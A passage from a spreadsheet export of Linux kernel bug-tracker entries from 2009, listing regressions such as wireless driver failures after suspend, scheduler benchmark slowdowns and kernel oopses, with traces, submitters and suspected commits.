    <t>after suspend resume ath9k crashes with: Oct 7 22:07:57 lisabook Pid: 1665, comm: phy0 Not tainted 2.6.31-tuxonice #1 Oct 7 22:07:57 lisabook Call Trace: Oct 7 22:07:57 lisabook [&lt;ffffffffa0104ec9&gt;] ? ieee80211_sta_work+0xd19/0xed0 [mac80211] Oct 7 22:07:57 lisabook [&lt;ffffffffa0104ec9&gt;] ? ieee80211_sta_work+0xd19/0xed0 [mac80211] Oct 7 22:07:57 lisabook [&lt;ffffffff81040515&gt;] ? warn_slowpath_common+0x85/0xb0 Oct 7 22:07:57 lisabook [&lt;ffffffffa01041b0&gt;] ? ieee80211_sta_work+0x0/0xed0 [mac80211] Oct 7 22:07:57 lisabook [&lt;ffffffffa0104ec9&gt;] ? ieee80211_sta_work+0xd19/0xed0 [mac80211] Oct 7 22:07:57 lisabook [&lt;ffffffff810bee8c&gt;] ? get_partial_node+0x1c/0x80 Oct 7 22:07:57 lisabook [&lt;ffffffff810c21a8&gt;] ? __slab_alloc+0x128/0x430 Oct 7 22:07:57 lisabook [&lt;ffffffff81366e98&gt;] ? dev_alloc_skb+0x18/0x40 Oct 7 22:07:57 lisabook [&lt;ffffffffa01360e7&gt;] ? ath9k_hw_update_mibstats+0x87/0xb0 [ath9k] Oct 7 22:07:57 lisabook [&lt;ffffffff81032c7d&gt;] ? update_curr+0x6d/0xc0 Oct 7 22:07:57 lisabook [&lt;ffffffff81030f2f&gt;] ? clear_buddies+0x1f/0x30 Oct 7 22:07:57 lisabook [&lt;ffffffff81032e8c&gt;] ? dequeue_entity+0x1c/0xc0 Oct 7 22:07:57 lisabook [&lt;ffffffff81032743&gt;] ? __wake_up+0x43/0x70 Oct 7 22:07:57 lisabook [&lt;ffffffff8105220f&gt;] ? __queue_work+0x2f/0x50 Oct 7 22:07:57 lisabook [&lt;ffffffff81052297&gt;] ? queue_work_on+0x37/0x50 Oct 7 22:07:57 lisabook [&lt;ffffffffa0101332&gt;] ? ieee80211_mlme_notify_scan_completed+0x52/0x60 [mac80211] Oct 7 22:07:57 lisabook [&lt;ffffffff814292a6&gt;] ? mutex_lock+0x16/0x50 Oct 7 22:07:57 lisabook [&lt;ffffffffa01041b0&gt;] ? ieee80211_sta_work+0x0/0xed0 [mac80211] Oct 7 22:07:57 lisabook [&lt;ffffffff810524f6&gt;] ? worker_thread+0x136/0x210 Oct 7 22:07:57 lisabook [&lt;ffffffff81055a80&gt;] ? autoremove_wake_function+0x0/0x30 Oct 7 22:07:57 lisabook [&lt;ffffffff810523c0&gt;] ? worker_thread+0x0/0x210 Oct 7 22:07:57 lisabook [&lt;ffffffff81055926&gt;] ? kthread+0xa6/0xb0 Oct 7 22:07:57 lisabook [&lt;ffffffff8100c11a&gt;] ? child_rip+0xa/0x20 Oct 7 22:07:57 lisabook [&lt;ffffffff81055880&gt;] ? kthread+0x0/0xb0 Oct 7 22:07:57 lisabook [&lt;ffffffff8100c110&gt;] ? child_rip+0x0/0x20 Oct 7 22:07:57 lisabook ---[ end trace 9dd6d00c7ea47cce ]--- it's on a macbook 2,1 uname -a: Linux lisabook 2.6.31-tuxonice #3 SMP Fri Oct 9 22:32:54 CEST 2009 x86_64 Intel(R) Core(TM)2 CPU T7400 @ 2.16GHz GenuineIntel GNU/Linux gcc --version: gcc (GCC) 4.1.2 (Gentoo 4.1.2 p1.0.2)</t>
  </si>
  <si>
    <t>ath5k wireless not working after suspend-resume - eeepc</t>
  </si>
  <si>
    <t>2.6.32-rc[1-2]</t>
  </si>
  <si>
    <t>2009-10-11 20:11 UTC</t>
  </si>
  <si>
    <t>2009-11-17 21:45 UTC</t>
  </si>
  <si>
    <t>Subject : Re: [Bug #13943] WARNING: at net/mac80211/mlme.c:2292 with ath5k Submitter : Fabio Comolli &lt;fabio.comolli@gmail.com&gt; Date : 2009-10-03 15:36 References : http://lkml.org/lkml/2009/10/3/91 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2009-10-11 20:20 UTC</t>
  </si>
  <si>
    <t>2009-11-17 21:58 UTC</t>
  </si>
  <si>
    <t>Subject : When this happens my Machine hangs - Kernel 2.6.32-rc2: INFO: task master:26085 blocked for more than 120 seconds Submitter : Zeno Davatz &lt;zdavatz@gmail.com&gt; Date : 2009-10-02 10:16 References : http://marc.info/?l=linux-kernel&amp;m=125447858618412&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>MCEs caused by commit db8be50c4307dac2b37305fc59c8dc0f978d09ea</t>
  </si>
  <si>
    <t>2.6.32-rc</t>
  </si>
  <si>
    <t>2009-10-11 20:34 UTC</t>
  </si>
  <si>
    <t>2009-10-12 21:45 UTC</t>
  </si>
  <si>
    <t>Subject : Patch "USB: Work around BIOS bugs by quiescing USB controllers earlier" causes MCEs Submitter : Nick Piggin &lt;npiggin@suse.de&gt; Date : 2009-10-02 7:34 References : http://marc.info/?l=linux-kernel&amp;m=125446885705223&amp;w=4 Notify-Also : David Woodhouse &lt;dwmw2@infradead.org&gt; Notify-Also : Mikael Pettersson &lt;mikpe@it.uu.se&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit db8be50c4307dac2b37305fc59c8dc0f978d09ea Author: David Woodhouse &lt;dwmw2@infradead.org&gt; Date: Mon Aug 3 12:40:27 2009 +0100 USB: Work around BIOS bugs by quiescing USB controllers earlier Signed-off-by: David Woodhouse &lt;David.Woodhouse@intel.com&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;</t>
  </si>
  <si>
    <t>Kernel NULL pointer dereference/ kvm subsystem</t>
  </si>
  <si>
    <t>2.6.31.1</t>
  </si>
  <si>
    <t>2009-10-11 20:41 UTC</t>
  </si>
  <si>
    <t>2010-02-08 20:47 UTC</t>
  </si>
  <si>
    <t>Subject : kernel NULL pointer dereference/ kvm subsystem Submitter : Don Dupuis &lt;dondster@gmail.com&gt; Date : 2009-10-06 14:38 References : http://marc.info/?l=linux-kernel&amp;m=125484025021737&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>conservative cpufreq governor broken</t>
  </si>
  <si>
    <t>2009-10-11 20:46 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTED] "conservative" cpufreq governor broken Submitter : Steven Noonan &lt;steven@uplinklabs.net&gt; Date : 2009-10-05 16:32 References : http://marc.info/?l=linux-kernel&amp;m=125476067108252&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit f2e21c9610991e95621a81407cdbab881226419b Author: Eero Nurkkala &lt;ext-eero.nurkkala@nokia.com&gt; Date: Mon May 25 09:57:37 2009 +0300 NOHZ: Properly feed cpufreq ondemand governor Signed-off-by: Eero Nurkkala &lt;ext-eero.nurkkala@nokia.com&gt; Reported-by: Tero Kristo &lt;tero.kristo@nokia.com&gt; Acked-by: Rik van Riel &lt;riel@redhat.com&gt; Acked-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt;</t>
  </si>
  <si>
    <t>Problems with net/core/skbuff.c</t>
  </si>
  <si>
    <t>2009-10-11 20:50 UTC</t>
  </si>
  <si>
    <t>2009-10-26 20:56 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31.2 problems with net/core/skbuff.c Submitter : Massimo Cetra &lt;mcetra@navynet.it&gt; Date : 2009-10-08 14:51 References : http://marc.info/?l=linux-kernel&amp;m=125501488220358&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ACPI Warning for \_SB_.BAT0._BIF: Converted Buffer to expected String</t>
  </si>
  <si>
    <t>2009-10-11 20:54 UTC</t>
  </si>
  <si>
    <t>2009-12-01 12:13 UTC</t>
  </si>
  <si>
    <t>Subject : ACPI Warning for \_SB_.BAT0._BIF: Converted Buffer to expected String at index 9 (20090903/nsrepair-132) Submitter : Justin Mattock &lt;justinmattock@gmail.com&gt; Date : 2009-10-08 21:46 References : http://marc.info/?l=linux-kernel&amp;m=125504031328941&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Video tearing/glitching with T400 laptops</t>
  </si>
  <si>
    <t>2009-10-11 21:03 UTC</t>
  </si>
  <si>
    <t>2009-11-17 22:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32 regression (bisected): Video tearing/glitching with T400 laptops Submitter : "Theodore Ts'o" &lt;tytso@mit.edu&gt; Date : 2009-10-02 22:40 References : http://marc.info/?l=linux-kernel&amp;m=125452324520623&amp;w=4 Handled-By : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Notify-Also : Arkadiusz Miskiewicz &lt;a.miskiewicz@gmail.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwlagn lost connection after s2ram (with warnings)</t>
  </si>
  <si>
    <t>2009-10-11 21:06 UTC</t>
  </si>
  <si>
    <t>2009-10-31 19:04 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.32-rc3] iwlagn lost connection after s2ram (with warnings) Submitter : "Carlos R. Mafra" &lt;crmafra2@gmail.com&gt; Date : 2009-10-07 14:20 References : http://marc.info/?l=linux-kernel&amp;m=125492569119947&amp;w=4 Notify-Also : reinette chatre &lt;reinette.chatre@intel.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Transmit failure in et131x.</t>
  </si>
  <si>
    <t>Staging</t>
  </si>
  <si>
    <t>2009-10-11 21:10 UTC</t>
  </si>
  <si>
    <t>2009-10-26 16:44 UTC</t>
  </si>
  <si>
    <t>drivers_staging@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Subject : [Regression, bisected] Transmit failure in et131x. Submitter : Nick Bowler &lt;nbowler@elliptictech.com&gt; Date : 2009-10-08 14:08 References : http://marc.info/?l=linux-kernel&amp;m=125501117713744&amp;w=4 Handled-By : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; Patch : http://patchwork.kernel.org/patch/52698/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hackbench regression with kernel 2.6.32-rc1</t>
  </si>
  <si>
    <t>2009-10-11 21:13 UTC</t>
  </si>
  <si>
    <t>2009-11-23 19:15 UTC</t>
  </si>
  <si>
    <t>Subject : hackbench regression with kernel 2.6.32-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2009-10-09 9:19 References : http://marc.info/?l=linux-kernel&amp;m=125508007510274&amp;w=4 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit 29cd8bae396583a2ee9a3340db8c5102acf9f6fd Author: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Date: Thu Sep 17 09:01:14 2009 +0200 sched: Fix SD_POWERSAVING_BALANCE|SD_PREFER_LOCAL vs SD_WAKE_AFFINE and commit de69a80be32445b0a71e8e3b757e584d7beb90f7 Author: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Date: Thu Sep 17 09:01:20 2009 +0200 sched: Stop buddies from hogging the system</t>
  </si>
  <si>
    <t>tbench regression with 2.6.32-rc1</t>
  </si>
  <si>
    <t>2009-10-11 21:16 UTC</t>
  </si>
  <si>
    <t>Subject : tbench regression with 2.6.32-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2009-10-09 9:51 References : http://marc.info/?l=linux-kernel&amp;m=125508216713138&amp;w=4 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit 59abf02644c45f1591e1374ee7bb45dc757fcb88 Author: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Date: Wed Sep 16 08:28:30 2009 +0200 sched: Add SD_PREFER_LOCAL First-Bad-Commit : 59abf02644c45f1591e1374ee7bb45dc757fcb88</t>
  </si>
  <si>
    <t>GPF in snd_hda_intel</t>
  </si>
  <si>
    <t>2009-10-11 21:23 UTC</t>
  </si>
  <si>
    <t>2009-10-26 16:49 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] GPF in snd_hda_intel Submitter : Luca Tettamanti &lt;kronos.it@gmail.com&gt; Date : 2009-10-10 13:01 References : http://marc.info/?l=linux-kernel&amp;m=125517999408019&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>keyboard under X with 2.6.31</t>
  </si>
  <si>
    <t>2009-10-11 21:31 UTC</t>
  </si>
  <si>
    <t>2009-10-27 08:21 UTC</t>
  </si>
  <si>
    <t>Subject : keyboard under X with 2.6.31 Submitter : "Frédéric L. W. Meunier" &lt;fredlwm@gmail.com&gt; Date : 2009-10-07 20:19 References : http://marc.info/?l=linux-kernel&amp;m=125494753228217&amp;w=4 Notify-Also : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt; Notify-Also : "Justin P. Mattock" &lt;justinmattock@gmail.com&gt; Notify-Also : Boyan &lt;btanastasov@yahoo.co.uk&gt; Notify-Also : Ed Tomlinson &lt;edt@aei.ca&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit e043e42bdb66885b3ac10d27a01ccb9972e2b0a3 Author: OGAWA Hirofumi &lt;hirofumi@mail.parknet.co.jp&gt; Date: Wed Jul 29 12:15:56 2009 -0700 pty: avoid forcing 'low_latency' tty flag Signed-off-by: OGAWA Hirofumi &lt;hirofumi@mail.parknet.co.jp&gt; Tested-by: Aneesh Kumar K.V &lt;aneesh.kumar@linux.vnet.ibm.com&gt; [ Modified to do the tty_flush_to_ldisc() inside input_available_p() so that it triggers for both read and poll() - Linus] Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>Build system issue</t>
  </si>
  <si>
    <t>2009-10-11 21:40 UTC</t>
  </si>
  <si>
    <t>2009-10-26 20:58 UTC</t>
  </si>
  <si>
    <t>Subject : [regressions] Re: kbuild: save ARCH &amp; CROSS_COMPILE when building a kernel Submitter : Peter Zijlstra &lt;peterz@infradead.org&gt; Date : 2009-10-09 8:58 References : http://marc.info/?l=linux-kernel&amp;m=125507914909152&amp;w=4 Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; Notify-Also : Pavel Machek &lt;pavel@ucw.cz&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit 575543347b5baed0ca927cb90ba8807396fe9cc9 Author: Sam Ravnborg &lt;sam@ravnborg.org&gt; Date: Sun Sep 20 12:24:55 2009 +0200 kbuild: save ARCH &amp; CROSS_COMPILE when building a kernel First-Bad-Commit : 575543347b5baed0ca927cb90ba8807396fe9cc9</t>
  </si>
  <si>
    <t>bind a device to a driver doesn't not work anymore</t>
  </si>
  <si>
    <t>2009-10-11 21:46 UTC</t>
  </si>
  <si>
    <t>2009-11-03 09:31 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] "bind" a device to a driver doesn't not work anymore Submitter : Éric Piel &lt;Eric.Piel@tremplin-utc.net&gt; Date : 2009-10-11 0:04 References : http://marc.info/?l=linux-kernel&amp;m=125521979921241&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>use after free of struct powernow_k8_data</t>
  </si>
  <si>
    <t>2009-10-11 21:50 UTC</t>
  </si>
  <si>
    <t>2011-07-30 06:42 UTC</t>
  </si>
  <si>
    <t>Subject : Re: use after free of struct powernow_k8_data Submitter : Michal Schmidt &lt;mschmidt@redhat.com&gt; Date : 2009-09-24 14:51 References : http://marc.info/?l=linux-kernel&amp;m=125380383515615&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. It helps if the following commits are reverted: commit 1ff6e97f1d993dff2f9b6f4a9173687370660232 Author: Rusty Russell &lt;rusty@rustcorp.com.au&gt; Date: Fri Jun 12 20:55:37 2009 +0930 [CPUFREQ] cpumask: avoid playing with cpus_allowed in powernow-k8.c commit e15bc4559b397a611441a135b1f5992f07d0f436 Author: Naga Chumbalkar &lt;nagananda.chumbalkar@hp.com&gt; Date: Thu Jun 11 15:26:54 2009 +0000 [CPUFREQ] powernow-k8: get drv data for correct CPU</t>
  </si>
  <si>
    <t>Touchpad "paste" stops working after suspend to RAM</t>
  </si>
  <si>
    <t>2009-10-11 21:54 UTC</t>
  </si>
  <si>
    <t>2009-10-26 16:41 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected regression] Touchpad "paste" stops working after suspend to RAM Submitter : "Carlos R. Mafra" &lt;crmafra2@gmail.com&gt; Date : 2009-10-11 16:21 References : http://marc.info/?l=linux-kernel&amp;m=125527987316493&amp;w=4 Handled-By : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>disable/enable wlan broken with ath5k</t>
  </si>
  <si>
    <t>2.6.31.3</t>
  </si>
  <si>
    <t>2009-10-13 12:35 UTC</t>
  </si>
  <si>
    <t>Daniel Bumke</t>
  </si>
  <si>
    <t>2010-02-09 15:10 UTC</t>
  </si>
  <si>
    <t>This bug was initially reported to http://bugs.archlinux.org/task/16591 The wireless on my Asus eee 901 works. Using FN-F2 to disable the wlan works. However, after using FN-F2 to enable the wlan fails. Wlan works again after reboot. This problem did not occur with version 2.6.30.6 (downgrading fixes the issue). Additional info: kernel26 2.6.31.3-1 acpi-eeepc-generic 0.9.2-1 networkmanager 0.7.1-1 lspci | grep -i wireless 01:00.0 Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network Adapter (rev 01) /var/log/error.log &lt;snip&gt; kernel: ath5k phy0: failed to wakeup the MAC Chip kernel: ath5k phy0: can't reset hardware (-5) &lt;snip&gt; kernel.log attached Steps to reproduce: -start eeepc 901 -connect to wireless -disable wireless -try to enable wireless (fails)</t>
  </si>
  <si>
    <t>Atheros ath9k module is not working with 2.6.31.1 on an Acer Extensa 7630EZ</t>
  </si>
  <si>
    <t>2.6.31.x</t>
  </si>
  <si>
    <t>2009-10-14 11:17 UTC</t>
  </si>
  <si>
    <t>2009-11-10 20:55 UTC</t>
  </si>
  <si>
    <t>This bug was initially reported at the Archlinux Bugtracker (http://bugs.archlinux.org/task/16413) The Atheros ath9k module is not working with [testing]-kernel 2.6.31.1 on an Acer Extensa 7630EZ. Downgrading to 2.6.30.x solves this problem ################################################# #### Log with 2.6.30 Kernel (Wifi is working) ### ################################################# [bernhard@wallaby ~]$ lsmod |grep ath ath9k 356404 0 mac80211 211488 1 ath9k cfg80211 78152 2 ath9k,mac80211 rfkill 13108 4 ath9k,acer_wmi led_class 5112 2 ath9k,acer_wmi [bernhard@wallaby ~]$ dmesg |grep ath ath9k 0000:05:00.0: enabling device (0000 -&gt; 0002) ath9k 0000:05:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 ath9k 0000:05:00.0: setting latency timer to 64 phy0: Selected rate control algorithm 'ath9k_rate_control' Registered led device: ath9k-phy0::radio Registered led device: ath9k-phy0::assoc Registered led device: ath9k-phy0::tx Registered led device: ath9k-phy0::rx ################################################# ##################################################### #### Log with 2.6.31 Kernel (Wifi is not working) ### ##################################################### [bernhard@wallaby ~]$ dmesg |grep ath ath9k 0000:05:00.0: enabling device (0000 -&gt; 0002) ath9k 0000:05:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 ath9k 0000:05:00.0: setting latency timer to 64 ath9k 0000:05:00.0: PCI INT A disabled ##################################################### Steps to reproduce: When I upgrade to a 2.6.31.x kernel, the wlan0 interface is detected and disabled instantly so I can't do something like iwlist wlan0 scan. If any further information would be useful, I will happily provide it.</t>
  </si>
  <si>
    <t>Reboot on kernel load</t>
  </si>
  <si>
    <t>2.6.31.4</t>
  </si>
  <si>
    <t>2009-10-15 23:57 UTC</t>
  </si>
  <si>
    <t>2009-11-21 20:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 23422 [details] Linux config The kernel reboots upon loading on a ECS K8T890 mainboard with AMD Athlon 64 3800+ cpu. Kernel appears to still be initializing when the computer reboots. Not entirely sure since the screen blips too fast to get anything meaningful. Linux kernel 2.6.31.3 worked with identical config file. Identical config file works on another computer.</t>
  </si>
  <si>
    <t>backlight controls gone mad - ATI HD 3650</t>
  </si>
  <si>
    <t>2009-10-17 20:33 UTC</t>
  </si>
  <si>
    <t>Nélson «VuDu» Cunha</t>
  </si>
  <si>
    <t>2009-12-17 03:38 UTC</t>
  </si>
  <si>
    <t>Hello, I'm using ArchLinux (here's the "downstream" bug report: http://bugs.archlinux.org/task/16698) and with the last update to kernel 2.6.31.4 my backlight/brightness controls have gone mad. My laptop's screen keeps blinking, slowly increasing or decreasing its luminosity randomly. Sometimes it stays still for a couple of minutes at any random brightness level, but it's very uncomfortable for the eyes when it's blinking. Here's a video of what's happening: http://www.mediafire.com/download.php?z4mi4uzidjn I've tried to use /proc/acpi/video/VGA/LCDD/brightness and /sys/class/backlight/acpi_video0/brightness but with no luck, because they make no changes and when I cat them I get wrong values. I tried using xbacklight but it gives me "No outputs have backlight property". With the previous (2.6.30.6) version I had no problems and after getting this problem I installed Arch's "kernel26-lts" package (2.6.27.37) and I'm having no issues with that kernel. My laptop is an ASUS M51VA with an Intel C2D and an ATI HD 3650. I tried fglrx, radeon and radeonhd and it made no difference. Another smaller issue, I dunno if its distro-specific but starting some months ago, the backlight gets pretty dim during the boot (maybe around udev loading, before the daemons start) and I had to add a couple of commands to my rc.local to put it back to the max brightness levels. That happens both with AC and DC. If you need more details, please say so. Best Regards.</t>
  </si>
  <si>
    <t>Computer becomes unusable without any apparent reason</t>
  </si>
  <si>
    <t>2.6.32-rc4</t>
  </si>
  <si>
    <t>2009-10-18 18:32 UTC</t>
  </si>
  <si>
    <t>2009-12-29 22:35 UTC</t>
  </si>
  <si>
    <t>Hi, This happened to me two times today. The first time, I wasn't even in front of the computer: I heard a system beep and when I looked at it, the computer was totally irresponsive. I couldn't input anything on the screen, the Num, Caps or Scroll Lock keys wouldn't do any effect on the keyboard lights, and the cursor wouldn't move. After a cold-reboot I ran memcheck86+ and fsck on all drives, but no errors appeared. The second time, I had just clicked on an URL on icedove (= Mozilla Thunderbird) to a (trusted) PDF file sent by a friend. When the file was opening, the system beep started sounding uninterruptedly and no input could be sent to the computer. After a cold-reboot, still no errors found. I'm attaching the syslog for both occurrences. Regards, Luís Picciochi</t>
  </si>
  <si>
    <t>[PATCH] IDE Probe fails to find CD drive</t>
  </si>
  <si>
    <t>2009-10-18 19:53 UTC</t>
  </si>
  <si>
    <t>Matt</t>
  </si>
  <si>
    <t>2012-06-13 20:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 23463 [details] System information for 2.6.30 and 2.6.31 Since updating to 2.6.31 my CD drive is no longer detected. The drive is still detected in version 2.6.30. The offending part of dmesg appears to be: Probing IDE interface ide1... ide1: no devices on the port Compared with 2.6.30's: Probing IDE interface ide1... hdc: PLEXTOR CD-R PX-W8432T, ATAPI CD/DVD-ROM drive hdc: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hdc: MWDMA2 mode selected I have checked to make sure that the CD drive is set to master (it is), and have also tried kernel 2.6.32-rc5 with identical results. I cannot find any obvious differences in the kernel configurations that may be causing the problem. I have attached various logs / proc / config files that i think are appropriate. However, i cannot find much information that distinguishes them.</t>
  </si>
  <si>
    <t>Info: mapping multiple BARs. Your kernel is fine.</t>
  </si>
  <si>
    <t>2.6.28 - 2.6.31</t>
  </si>
  <si>
    <t>2009-10-20 07:19 UTC</t>
  </si>
  <si>
    <t>2009-11-23 16:32 UTC</t>
  </si>
  <si>
    <t>acpi_ex_system_memory_space_handler() is implemented to round up mapping requests to ACPI_SYSMEM_REGION_WINDOW_SIZE. However, sometimes this overlaps with other mappings. At least in one case, this is because doing mappings of this size crosses a page boundary. http://lkml.org/lkml/2008/12/30/128 In Linux 2.6.28 a check was added to see if overlapping mapping requests with different properties are made, and various AML requests have been triggering Linux warnings ever since: http://kerneloops.org/searchweek.php?search=acpi_os_map_memory The fix for this problem is likely to round up the mapping request to a page boundary, but to not cross a page boundary.</t>
  </si>
  <si>
    <t>No wireless connection with Ralink RT2500 since update to kernel 2.6.31</t>
  </si>
  <si>
    <t>2.6.31.5</t>
  </si>
  <si>
    <t>2009-10-24 21:18 UTC</t>
  </si>
  <si>
    <t>Filipp Andjelo</t>
  </si>
  <si>
    <t>2011-03-30 23:56 UTC</t>
  </si>
  <si>
    <t>Description: After the kernel update to 2.6.31 my wireless network is dead. Till now, I didn't find anything that could bring a solution or even s.t. about the root of the problem. Module seems to be initialized successfully, but no even a scan for networks can be done. The only error I could find is a repeating crap in the dmesg (see attachment).</t>
  </si>
  <si>
    <t>EFI boot on x86 fails in .32</t>
  </si>
  <si>
    <t>2009-10-25 23:19 UTC</t>
  </si>
  <si>
    <t>2009-11-04 09:37 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] EFI boot on x86 fails in .32 Submitter : Matthew Garrett &lt;mjg59@srcf.ucam.org&gt; Date : 2009-10-20 0:34 References : http://marc.info/?l=linux-kernel&amp;m=125599887314290&amp;w=4 Handled-By : Feng Tang &lt;feng.tang@intel.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linker errors on ia64 with NR_CPUS=4096</t>
  </si>
  <si>
    <t>2009-10-25 23:29 UTC</t>
  </si>
  <si>
    <t>2009-11-16 23:04 UTC</t>
  </si>
  <si>
    <t>Subject : Commit 34d76c41 causes linker errors on ia64 with NR_CPUS=4096 Submitter : Jeff Mahoney &lt;jeffm@suse.com&gt; Date : 2009-10-18 22:28 References : http://marc.info/?l=linux-kernel&amp;m=125590493116720&amp;w=4 Notify-Also : Jiri Kosina &lt;jkosina@suse.cz&gt; Notify-Also : Tejun Heo &lt;tj@kernel.org&gt; Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; Notify-Also : Peter Zijlstra &lt;peterz@infradead.org&gt; Notify-Also : Christoph Lameter &lt;cl@linux-foundation.org&gt; Notify-Also : "Luck, Tony" &lt;tony.luck@intel.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit 34d76c41554a05425613d16efebb3069c4c545f0 Author: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Date: Thu Aug 27 13:08:56 2009 +0200 sched: Fix division by zero - really First-Bad-Commit : 34d76c41554a05425613d16efebb3069c4c545f0</t>
  </si>
  <si>
    <t>hso soft-lockup</t>
  </si>
  <si>
    <t>2009-10-26 07:49 UTC</t>
  </si>
  <si>
    <t>Antti Kaijanmäki</t>
  </si>
  <si>
    <t>2012-06-13 20:43 UTC</t>
  </si>
  <si>
    <t>There's a bug in hso driver which causes kernel soft-locks on SMP machines. I have an Intel atom based netbook and I can reproduce the soft-lockup every time. I sent a patch to LKML (see URL), but here's some additional information. I've tested Ubuntu kernel 2.6.31-14 and 2.6.32-rc5 git vanilla and both lock-up the same. I've tested the patch on both and it fixes the situation. I haven't been able to test with other Option hardware as I don't have any. The bug should be clearly verified from the code. In hso_serial_close() kref_put() calls hso_serial_ref_free() when serial-&gt;parent-&gt;ref goes 0. hso_serial_ref_free() calls directly hso_free_serial_device() which destroys the hso_serial and hso_device objects. Old code uses these destroyed objects after the kref_put() call. In my case the soft-lockup happens in mutex_unlock() at the end of hso_serial_close() as the mutex is destroyd too early with the hso_device.</t>
  </si>
  <si>
    <t>freez in TCP stack</t>
  </si>
  <si>
    <t>2009-10-26 12:47 UTC</t>
  </si>
  <si>
    <t>Vaclav Bilek</t>
  </si>
  <si>
    <t>2012-06-13 20:44 UTC</t>
  </si>
  <si>
    <t>We are hiting kernel panics on Dell R610 servers with e1000e NICs; it apears usualy under a high network trafic ( around 100Mbit/s) but it is not a rule it has happened even on low trafic. Servers are used as reverse http proxy (varnish). On 6 equal servers this panic happens aprox 2 times a day depending on network load. Machine completly freezes till the management watchdog reboots. We had to put serial console on these servers to catch the oops. Is there anything else We can do to debug this? The RIP is always the same: RIP: 0010:[&lt;ffffffff814203cc&gt;] [&lt;ffffffff814203cc&gt;] tcp_xmit_retransmit_queue+0x8c/0x290 rest of the oops always differs a litle ... here is an example: RIP: 0010:[&lt;ffffffff814203cc&gt;] [&lt;ffffffff814203cc&gt;] tcp_xmit_retransmit_queue+0x8c/0x290 RSP: 0018:ffffc90000003a40 EFLAGS: 00010246 RAX: ffff8807e7420678 RBX: ffff8807e74205c0 RCX: 0000000000000000 RDX: 000000004598a105 RSI: 0000000000000000 RDI: ffff8807e74205c0 RBP: ffffc90000003a80 R08: 0000000000000003 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000 R13: ffff8807e74205c0 R14: ffff8807e7420678 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffffc90000000000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000000000 